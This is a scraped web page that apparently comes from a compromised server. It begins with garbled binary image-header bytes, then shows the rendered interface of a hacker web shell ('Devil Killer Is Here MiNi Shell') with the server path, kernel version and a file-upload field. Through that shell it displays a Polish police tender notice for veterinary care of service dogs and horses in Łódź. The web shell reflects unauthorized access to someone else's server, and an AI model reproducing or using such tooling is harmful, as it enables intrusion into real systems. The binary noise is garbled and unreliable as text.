JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240312/0024073401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług weterynaryjnych na rzecz psów i koni służbowych będących na stanie Komendy Wojewódzkiej Policji w Łodzi oraz jednostek garnizonu łódzkiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Wojewódzka Policji w Łodzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 470754976</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Lutomierska 108/112</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">91-048</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zampub@ld.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://przetargi.lodzka.policja.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług weterynaryjnych na rzecz psów i koni służbowych będących na stanie Komendy Wojewódzkiej Policji w Łodzi oraz jednostek garnizonu łódzkiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f0beb3a7-e04c-11ee-a01e-f641a8763d5f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00240734</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00239634/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.10 Świadczenie usług weterynaryjnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/899717 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim.<br/> W postępowaniu cała komunikacja, między Zamawiającym a Wykonawcami odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej poprzez platformę zakupową -<br/>https://platformazakupowa.pl/pn/kwp_lodz dedykowaną dla niniejszego postępowania poprzez wykorzystanie przycisku: „wyślij wiadomość do Zamawiającego” na stronie Platformy zakupowej.<br/> Zgodnie z art. 61 ust. 1 uPzp w postępowaniu komunikacja i wymiana informacji oraz oferty, dokumenty, oświadczenia, zapytania do treści SWZ, wyjaśnienia i inne informacje dotyczące postępowania składane są przez Wykonawcę wyłącznie za pośrednictwem platformy, na której prowadzone jest postępowanie.<br/> W sytuacji awarii platformy zakupowej Zamawiający dopuszcza,<br/>opcjonalnie, komunikację za pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami: zampub@ld.policja.gov.pl. Adres url.https://platformazakupowa.pl/pn/kwp_lodz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów, elektronicznych kopii dokumentów i oświadczeń oraz informacji przy użyciu<br/>środków komunikacji elektronicznej określają: Regulamin Internetowej Platformy Zakupowej ( dostępny pod adresem https://platformazakupowa.pl/strona/1-regulamin) oraz Instrukcja składania oferty dla Wykonawcy (dostępna pod adresem<br/>https://platformazakupowa.pl/strona/45-instrukcje).<br/>2. Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące specyfikacji<br/>połączenia, formatu przesyłanych danych<br/>oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem platformazakupowa.pl, tj.: stały dostęp do sieci<br/>Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, komputer klasy PC lub MAC o następującej konfiguracji:<br/>pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,włączona obsługa JavaScript, zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8, Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>3.Występuje limit objętości plików lub spakowanych folderów do ilości 10 plików lub spakowanych folderów przy maksymalnej<br/>sumarycznej wielkości 500 MB.<br/>4.Oferta, wniosek oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem osobistym. W procesie składania oferty, wniosku w tym przedmiotowych środków dowodowych na platformie, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty Wykonawca składa bezpośrednio na dokumencie, który następnie przesyła do systemu.<br/>5.Podpisy kwalifikowane wykorzystywane przez Wykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie<br/>Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych<br/>na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”.<br/>6.W przypadku wykorzystania formatu podpisu XAdES zewnętrzny. Zamawiający wymaga dołączenia odpowiedniej ilości plików tj.<br/>podpisywanych plików z danymi oraz plików XAdES.<br/>7.Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania<br/>oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.<br/>8.Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne z Załącznikiem nr 2 do “Rozporządzenia Rady<br/>Ministrów w sprawie Krajowych Ram Interoperacyjności (KRI), minimalnych wymagań dla rejestrów publicznych i wymiany informacji<br/>w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”, zwanego dalej Rozporządzeniem KRI.<br/>9. Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi maksymalnie<br/>10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacjie DoApp służącej do składania podpisu osobistego, który<br/>wynosi maksymalnie 5MB. podpis zaufany -<br/>https://www.biznes.gov.pl/pl/firma/sprawyurzedowe/chcezalatwicspraweprzezinternet/profilzaufanyipodpis-zaufany</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych - RODO) informuję Pana/Panią o tym, w jaki sposób Komendant Wojewódzki Policji w Łodzi przetwarza Pana/Pani dane osobowe:<br/>1.	Administratorem Danych Osobowych (ADO) jest Komendant Wojewódzki Policji w Łodzi z siedzibą przy ul. Lutomierskiej 108/112 w Łodzi, kod 91-048. <br/>2.	Dane kontaktowe Inspektora Ochrony Danych (IOD) – e-mail: iod@ld.policja.gov.pl<br/>3.	Dane osobowe, zwane dalej „danymi”, przetwarzane są:<br/>a.	na podstawie art. 6 ust. 1 lit. c RODO, w celu wykonania obowiązku prawnego ciążącego na Administratorze, tj. realizacji postępowania o udzielenie zamówienia publicznego na świadczenie usług weterynaryjnych na rzecz psów i koni służbowych będących na stanie Komendy Wojewódzkiej Policji w Łodzi oraz jednostek garnizonu łódzkiego – FZ-2380/7/24/ET prowadzonego w oparciu o ustawę z dnia 11 września 2019 roku Prawo zamówień publicznych (dalej ustawa PZP), w trybie podstawowym bez negocjacji art. 275 pkt. 1.<br/>b.	w przypadku wyboru Pana/Pani oferty na podstawie art. 6 ust. 1 lit. b RODO, w celu wykonania umowy zawartej z Komendantem Wojewódzkim Policji bądź jego przedstawicielem prawnym lub podjęcie działań na Pana/Pani żądanie przed jej zawarciem.<br/>4.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP.<br/>5.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania zgodnie z art. 18 oraz art. 74 ustawy PZP, oraz inne jednostki Policji w celu i zakresie koniecznym do realizacji umowy.<br/>6.	W związku z przetwarzaniem Pana/Pani danych osobowych, przysługuje Panu/Pani prawo do: <br/>a.	dostępu do treści danych, na podstawie art. 15 RODO z zastrzeżeniem, że udostępniane dane osobowe nie mogą ujawniać informacji niejawnych, ani naruszać tajemnic prawnie chronionych, <br/>do których zachowania zobowiązany jest Komendant Wojewódzki Policji w Łodzi;<br/>b.	sprostowania danych, na podstawie art. 16 RODO;<br/>c.	ograniczenia przetwarzania danych, na podstawie art. 18 RODO - jeżeli kwestionuje Pan/Pani prawidłowość przetwarzanych danych, uważa, że są przetwarzane niezgodnie z prawem, bądź sprzeciwia się ich przetwarzaniu.<br/>7.	W przypadku uznania, że przetwarzanie przez Komendanta Wojewódzkiego Policji w Łodzi Pana/Pani danych osobowych narusza przepisy RODO, przysługuje Panu/Pani prawo do wniesienia skargi <br/>do Prezesa Urzędu Ochrony Danych Osobowych.	<br/>8.	Pana/Pani dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 ustawy PZP przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a w przypadku wybrania Pani/Pana oferty i podpisania umowy, jeżeli okres trwania umowy przekracza 4 lata, przez cały czas obowiązywania umowy, a po tym czasie przez okres wynikający z przepisów ustawy o narodowym zasobie archiwalnym i archiwach. Sposób kwalifikowania spraw oraz czas ich przechowywania określa Jednolity Rzeczowy Wykaz Akt Policji stanowiący załącznik do Zarządzenia nr 10 Komendanta Głównego Policji z dnia 15 maja 2020 roku.<br/>9.	Dane nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FZ-2380/7/24/ET</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług weterynaryjnych na rzecz psów i koni służbowych będących na stanie Komendy Wojewódzkiej Policji w Łodzi oraz jednostek garnizonu łódzkiego. Szczegółowy opis przedmiotu zamówienia odpowiednio do części zawiera załącznik 5.1-5.2 do SWZ. <br/>Usługi będą realizowane sukcesywnie w okresie trwania umowy. <br/>Wykonawca zobowiązuje się realizować przedmiot zamówienia zgodnie z postanowieniami umowy, której wzór zawarto w załączniku nr 9 do SWZ.<br/>Zgodnie z art. 95 ust. 1 uPzp Zamawiający wymaga, aby Wykonawca/podwykonawca w okresie realizacji umowy zatrudniał osoby wykonujące czynności związane z leczeniem zwierząt na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26.06.1974 r. – Kodeks pracy (Dz. U. z 2023 r., poz. 1465). Powyższy wymóg nie dotyczy osób fizycznych prowadzących działalność gospodarczą w zakresie, w jakim będą wykonywać osobiście usługi na rzecz Zamawiającego. <br/>Postanowienia dotyczące sposobu dokumentowania zatrudnienia oraz kontroli spełniania przez wykonawcę lub podwykonawcę wymagań dotyczących zatrudnienia na podstawie umowy o pracę oraz postanowienia dotyczące sankcji z tytułu niespełnienia wymagań określonych w art. 95 ust. 1 określono w paragrafie § 5 każdego ze wzorów umowy (załącznik nr 9 do SWZ).<br/>Część 1<br/>Świadczenia usług weterynaryjnych na rzecz psów służbowych.<br/>1.	Przedmiotem zamówienia jest świadczenie usług weterynaryjnych na rzecz psów służbowych będących na ewidencji KWP w Łodzi oraz jednostek garnizonu łódzkiego<br/>2. Wykonawca zobowiązuje się należycie prowadzić na bieżąco dokumentację medyczną leczonych zwierząt, wypełniać dokumenty stanowiące załączniki do umowy. Zamawiający w każdej chwili może dokonać wglądu w dokumentację medyczną leczonych psów oraz poprosić o odpis z wyników badań i kart leczenia psów. <br/> Pod pojęciem dokumentacja medyczna należy rozumieć: zbiór danych o stanie zdrowia psa służbowego, udzielonych mu świadczeniach medycznych, podanych lekach, odbytych zabiegach oraz wizytach lekarskich.<br/>Należyte prowadzenie dokumentacji oznacza:<br/>a) wpis w dokumentacji dokonywany jest niezwłocznie po udzieleniu świadczenia;<br/>b) każdy wpis oznaczony jest danymi osoby, która go dokonała;<br/>c) wpis dokonany w dokumentacji nie może być z niej usunięty, możliwa jest natomiast jego zmiana w przypadku popełnienia błędu, jednakże w tym zakresie musi zostać zamieszczona szczegółowa adnotacja określająca przyczynę błędu oraz oznaczenie osoby, która dokonała zmiany wpisu;<br/>d) strony dokumentacji medycznej muszą być ponumerowane;<br/>e) dokumentacja powinna być wypełniana w sposób czytelny;<br/>f) wpisy powinny być dokonywane chronologicznie;<br/>g) każda strona dokumentacji psa służbowego powinna być oznaczona przynajmniej jego imieniem oraz numerem identyfikacyjnym;<br/>h) dokument, który został włączony do dokumentacji, nie może być z niej usunięty.<br/>3. Jednostka zlecająca - zobowiązana jest indywidualnie do sporządzania przed planowaną wizytą zlecenia z dokładnym opisem przyczyny wizyty oraz przesłania go do Wydziału GMT KWP Łódź w celu zabezpieczenia środków finansowych. <br/> Po uzyskaniu zgody pracownik Wydziału GMT KWP w Łodzi odeśle mailem do jednostki zlecenie w celu umówienia spotkania z lekarzem weterynarii. Przewodnik psa zobowiązany jest przesłać do Wykonawcy zaakceptowane przez Wydział GMT KWP w Łodzi zlecenie lub okazać je lekarzowi weterynarii podczas wizyty.<br/> W wyjątkowych sytuacjach lekarz weterynarii może przyjąć psa służbowego bez zlecenia wyłącznie w przypadku nagłej wizyty (zagrażającej życiu i zdrowiu psa), każda kolejna wizyta wymaga zlecenia zaakceptowanego przez Wydział GMT KWP w Łodzi.<br/>4. W przypadku nagłych urazów, wypadków zlecenie nie jest wymagane, jednak po wykonanej usłudze Przewodnik psa zobowiązany jest sporządzić szczegółową notatkę służbową z podpisem przełożonego oraz załączyć ją pod fakturę wystawioną przez Przychodnię Weterynaryjną. <br/>5. Każde zlecenie ma zawierać numer / miesiąc / rok / KWP, KMP lub KPP / oraz datę wystawienia.<br/>6. Wykonawca zobowiązuje się do wystawiania faktur po każdej wykonanej usłudze, w terminie nie przekraczającym 10 dni od daty jej wykonania i przesłaniu faktury do siedziby Zamawiającego. Do każdej faktury musi zostać dołączone zlecenie przekazane do Lecznicy przez jednostkę oraz Specyfikacja wykonanej usługi z wyszczególnieniem wszystkich czynności podjętych przez Lekarza Weterynarii oraz podanych leków.<br/> Jeżeli wystąpi konieczność podania preparatów mineralno–witaminowych lub pielęgnacyjnych np. po przebytych zabiegach/operacjach, Wykonawca wystawi odrębną fakturę, pod warunkiem, że przed ich zastosowaniem uzyskał na to pisemną zgodę Naczelnika Wydziału GMT w Łodzi.<br/>7. W zakres usług wchodzić powinny m. in.: <br/>1. Okresowy przegląd weterynaryjny wykonywany w siedzibie Wykonawcy w razie konieczności na terenie jednostki Zamawiającego, podczas którego będą wykonywane następujące czynności:<br/>- ważenie<br/>- mierzenie temperatury<br/>- osłuchiwanie<br/>- przegląd oczu, uszu, skóry i uzębienia <br/>- obmacywanie<br/> - zabezpieczenie przeciwko pchłom i kleszczom oraz wydanie dawki dodatkowej na kolejne 6 miesięcy – do kolejnego przeglądu okresowego<br/>- odrobaczenie – według wskazań lekarza weterynarza jednak nie rzadziej niż dwa razy do roku ale nie częściej niż cztery razy do roku. <br/> W przypadku stwierdzenia w wyniku przeglądu konieczności wykonania zabiegów pielęgnacyjnych, lekarz weterynarii może wykonać następujące czynności:<br/> - czyszczenie uszu<br/> - obcięcie pazurów<br/> - czyszczenie gruczołów około odbytniczych<br/> - usunięcie kamienia nazębnego<br/>2. Szczepienia ochronne wykonywane raz w roku w siedzibie Wykonawcy lub podczas przeglądu okresowego ( jeżeli termin wykonania kolejnego szczepienia to umożliwia)<br/>- szczepienie przeciwko wściekliźnie <br/>- szczepienie przeciwko chorobom zakaźnym ( wieloskładnikowa szczepionka skojarzona zabezpieczająca m.in. przed następującymi chorobami: nosówka, zakażenie adenowirusowe i paro wirusowe, leptospiroza, choroba rubartha, parainfluenza)<br/>3. Diagnozowanie, leczenie, wykonywanie badań i zabiegów według potrzeb w siedzibie Wykonawcy obejmuje następujące czynności:<br/> - diagnozowanie i leczenie chorób układu oddechowego, krążenia, pokarmowego, moczowego i nerwowego, leczenie dietetyczne chorób wewnętrznych, prowadzenie leczenia i monitoring zwierząt przewlekle chorych, <br/>- rozpoznawanie, zapobieganie i leczenie chorób zakaźnych zwierząt np. parwowirozy, nosówki, itp., <br/>- diagnostyka chorób kwalifikujących się do leczenia chirurgicznego, drobne zabiegi chirurgiczne,<br/>- diagnozowanie urazów kończyn i kręgosłupa (badanie RTG), leczenie złamań kości i stawów, zakładanie opatrunków usztywniających i gipsowych, diagnostyka i leczenie chorób stawów.<br/>- badanie okulistyczne, leczenie zachowawcze chorób gałki ocznej, szycie ran powiek, itp.<br/>- diagnozowanie schorzeń układu rozrodczego samic i samców, diagnostyka i leczenie chorób jąder i prostaty, <br/> - diagnozowanie chorób ektopasożytniczych, dermatoz grzybiczych i bakteryjnych oraz chorób alergicznych i hormonalnych skóry, testy alergiczne, laboratoryjne badanie zeskrobin skórnych i wymazów z uszu, wykonywanie posiewów i anybiogramów, leczenie zaburzeń okrywy włosowej, leczenie dietetyczne (diety lecznicze).<br/>- wykonywanie eutanazji, oględzin i odbiór zwłok zwierząt wraz z wydaniem stosownych zaświadczeń i protokołów<br/>Dla Zamawiającego usługi planowane to usługi o, których mowa w punkcie 1-2 , natomiast Usługi nieplanowane to: zdarzenia losowe, choroby, itp. <br/>8. Wykonawca zobowiązuje się do:<br/>- świadczenia usług weterynaryjnych w siedzibie Wykonawcy a w razie konieczności na terenie województwa łódzkiego. <br/>- wykonywania okresowych badań (przeglądów) psów <br/>- ewentualnego udziału w pracach zespołu zajmującego się organizacją używania i utrzymania psów zgodnie z Zarządzeniem nr 91 Komendanta Głównego Policji z dnia 04.10.2022 r.<br/>- zapewnienia odpowiednich warunków lokalowych oraz wyposażenia techniczno – medycznego niezbędnego do należytego wykonania usługi – w przypadku świadczenia usług na terenie siedziby wykonawcy.<br/>- prowadzenia na bieżąco dokumentacji medycznej leczonych zwierząt, wypełniania dokumentów stanowiących załączniki do umowy, dokonywania wpisów w kartach przebiegu leczenia oraz w książeczkach zdrowia psów. Obejmujących rodzaj zastosowanego leczenia, w tym przeprowadzone zabiegi i zastosowane środki medyczne. <br/>- okazania Zamawiającemu w każdej chwili dokumentacji medycznej psa służbowego. <br/>- umieszczenia w Lecznicy w widocznym dla wszystkich miejscu 